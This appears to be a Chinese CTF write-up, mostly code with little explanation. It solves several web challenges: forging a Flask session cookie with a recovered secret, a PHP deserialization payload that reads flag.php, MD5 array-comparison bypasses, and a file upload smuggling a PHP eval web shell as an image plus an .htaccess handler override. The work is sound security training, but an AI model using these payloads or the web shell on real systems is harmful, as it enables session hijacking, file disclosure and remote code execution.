import sys
import zlib
from flask. sessions import session_json_serializer
from itsdangerous import base64_decode
def decryption ( payload) :
payload, sig = payload. rsplit( b'.' , 1 )
payload, timestamp = payload. rsplit( b'.' , 1 )
decompress = False
if payload. startswith( b'.' ) :
payload = payload[ 1 : ]
decompress = True
try :
payload = base64_decode( payload)
except Exception as e:
raise Exception( 'Could not base64 decode the payload because of '
'an exception' )
if decompress:
try :
payload = zlib. decompress( payload)
except Exception as e:
raise Exception( 'Could not zlib decompress the payload before '
'decoding the payload' )
return session_json_serializer. loads( payload)
if __name__ == '__main__' :
print ( decryption( sys. argv[ 1 ] . encode( ) ) )
$ python3 flask_session_decode.py .eJw9kEGLgzAQhf_KMuceTLSXQg9C2sWFGXGJDcmldFdrjKYLtmXV0v--sYc9DcwbvvfePOB4Huqrhc1tuNcrOLYVbB7w9gUbML6ISRYMObUouxFlM-VKxzjjLwkdGYU8l12sVZYstyh6i0qzXBx69Ls4F3tLc7NGH6b7cCjSEVU5GkU2F81EPIvJNZy48dodgt5FxnXMuHJEX6y17C0pY-ndtEbsEi3TmVQZGZlNJKsORTnmovIo0y08V_B9Hc7H209XX_4roMuiYLFEnFFlAVmwUGnSvIz0rDm6vdX-05NLkyXqsqdi-8JdTr4OiFPl2wtjsIL7tR5e_wEWwfMPgflkfg.Yk6DiQ.oMMh8zI-cCtKvp3iUUCQICevNBE
{ '_fresh' : True, '_id' : b'fd75453cb1911829f7330464ec6997ab8fd709a1f585e2a781a7892aa62c0011e1eca8827b76867ffb5c094f95f512d9a9a5fa4fbd18a035e4e2257d05187f10' , 'csrf_token' : b'224687ab31b9a45542ce4c6621abdf608789ce45' , 'name' : 'admin11' , 'user_id' : '10' }
$ git clone https://github.com/noraj/flask-session-cookie-manager.git && cd flask-session-cookie-manager
$ python -m venv venv
$ source venv/bin/activate
$ python setup.py install
$ python3 flask_session_cookie_manager3.py encode -s 'ckj123' -t "{'_fresh': True, '_id': b'fd75453cb1911829f7330464ec6997ab8fd709a1f585e2a781a7892aa62c0011e1eca8827b76867ffb5c094f95f512d9a9a5fa4fbd18a035e4e2257d05187f10', 'csrf_token': b'224687ab31b9a45542ce4c6621abdf608789ce45', 'name': 'admin', 'user_id': '10'}"
.eJw9kEFrg0AQhf9KmbMHXc1FyEHYpFiYEcuaZfcS0mpcV9eCJlQN-e_VHHoamDd87715wPk6VKOB-DbcKw_OTQnxA96-IAbt8pBEHiCjBkU7oajnTKoQF_wlrnwtkWWiDZVMo-0WeWdQqiDjpw7dIcz40dBS79Ct035Y5MmEspi0JJPxeiaWhmRrRkw7ZU-r3vratoG2xYQu3ynRGZLa0LtuND9ESiQLycLXIp1JlC3yYsp46VAke3h68D0O1_Ptp636_wpoU3-12CIuKNMVmQdrpVmxwleLYmiPRrlPRzaJtqjbnvL9C9dfXLUiLqVrevDgPlbD6zsQ-PD8A7xPZBw.Yk6FMw.Cq0nNGMXyUTx-wjf3sn3FQRAkBE
flag{734305d9-ed05-4194-8796-1449b16a914d}
< ? php
include ( "flag.php" ) ;
highlight_file ( __FILE__ ) ;
class FileHandler {
protected $op ;
protected $filename ;
protected $content ;
function __construct ( ) {
$op = "1" ;
$filename = "/tmp/tmpfile" ;
$content = "Hello World!" ;
$this -> process ( ) ;
}
public function process ( ) {
if ( $this -> op == "1" ) {
$this -> write ( ) ;
} else if ( $this -> op == "2" ) {
$res = $this -> read ( ) ;
$this -> output ( $res ) ;
} else {
$this -> output ( "Bad Hacker!" ) ;
}
}
private function write ( ) {
if ( isset ( $this -> filename ) && isset ( $this -> content ) ) {
if ( strlen ( ( string ) $this -> content ) > 100 ) {
$this -> output ( "Too long!" ) ;
die ( ) ;
}
$res = file_put_contents ( $this -> filename , $this -> content ) ;
if ( $res ) $this -> output ( "Successful!" ) ;
else $this -> output ( "Failed!" ) ;
} else {
$this -> output ( "Failed!" ) ;
}
}
private function read ( ) {
$res = "" ;
if ( isset ( $this -> filename ) ) {
$res = file_get_contents ( $this -> filename ) ;
}
return $res ;
}
private function output ( $s ) {
echo "[Result]: <br>" ;
echo $s ;
}
function __destruct ( ) {
if ( $this -> op === "2" )
$this -> op = "1" ;
$this -> content = "" ;
$this -> process ( ) ;
}
}
function is_valid ( $s ) {
for ( $i = 0 ; $i < strlen ( $s ) ; $i ++ )
if ( ! ( ord ( $s [ $i ] ) >= 32 && ord ( $s [ $i ] ) <= 125 ) )
return false ;
return true ;
}
if ( isset ( $_GET { 'str' } ) ) {
$str = ( string ) $_GET [ 'str' ] ;
if ( is_valid ( $str ) ) {
$obj = unserialize ( $str ) ;
}
}
< ? php
include ( "flag.php" ) ;
highlight_file ( __FILE__ ) ;
class FileHandler
{
protected $op = 2 ;
protected $filename = "flag.php" ;
protected $content = "Hack" ;
}
$a = new FileHandler ( ) ;
echo ( serialize ( $a ) ) ;
? >
< ? php
class FileHandler
{
public $op = 2 ;
public $filename = "flag.php" ;
public $content = "Hack" ;
}
$a = new FileHandler ( ) ;
$b = serialize ( $a ) ;
echo $b ;
? >
O:11:"FileHandler" :3:{ s:2:"op" ; i:2; s:8:"filename" ; s:8:"flag.php" ; s:7:"content" ; s:4:"Hack" ; }
I put something in F12 for you
include 'flag.php' ;
$flag = 'MRCTF{xxxxxxxxxxxxxxxxxxxxxxxxx}' ;
if ( isset ( $_GET [ 'gg' ] ) && isset ( $_GET [ 'id' ] ) ) {
$id = $_GET [ 'id' ] ;
$gg = $_GET [ 'gg' ] ;
if ( md5 ( $id ) === md5 ( $gg ) && $id !== $gg ) {
echo 'You got the first step' ;
if ( isset ( $_POST [ 'passwd' ] ) ) {
$passwd = $_POST [ 'passwd' ] ;
if ( ! is_numeric ( $passwd ) )
{
if ( $passwd == 1234567 )
{
echo 'Good Job!' ;
highlight_file ( 'flag.php' ) ;
die ( 'By Retr_0' ) ;
}
else
{
echo "can you think twice??" ;
}
}
else {
echo 'You can not get it !' ;
}
}
else {
die ( 'only one way to get the flag' ) ;
}
}
else {
echo "You are not a real hacker!" ;
}
}
else {
die ( 'Please input first' ) ;
}
} Please input first
<?php
error_reporting ( 0 ) ;
include "flag.php" ;
highlight_file ( __FILE__ ) ;
if ( $_POST [ 'param1' ] !== $_POST [ 'param2' ] && md5 ( $_POST [ 'param1' ] ) === md5 ( $_POST [ 'param2' ] ) ) {
echo $flag ;
} flag{ dfbfa6e9- 60e7 - 40 f6- b649- 72 bafca9fea9}
<!-- get -->
?id[]=QNKCDZO&gg[]=s155964671a
<!-- post -->
passwd=1234567a
$flag="flag{f79c3177-3c89-4c6f-bc85-7f972274b20b}"
Content-Disposition: form-data; name="uploaded"; filename="1.jpg"
Content-Type: image/jpeg
<?php @eval($_POST['hack']) ?>
Content-Disposition: form-data; name="uploaded"; filename=".htaccess"
Content-Type: image/jpeg
<FilesMatch "1">
SetHandler application/x-httpd-php
</FilesMatch>
扫一扫
2615
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
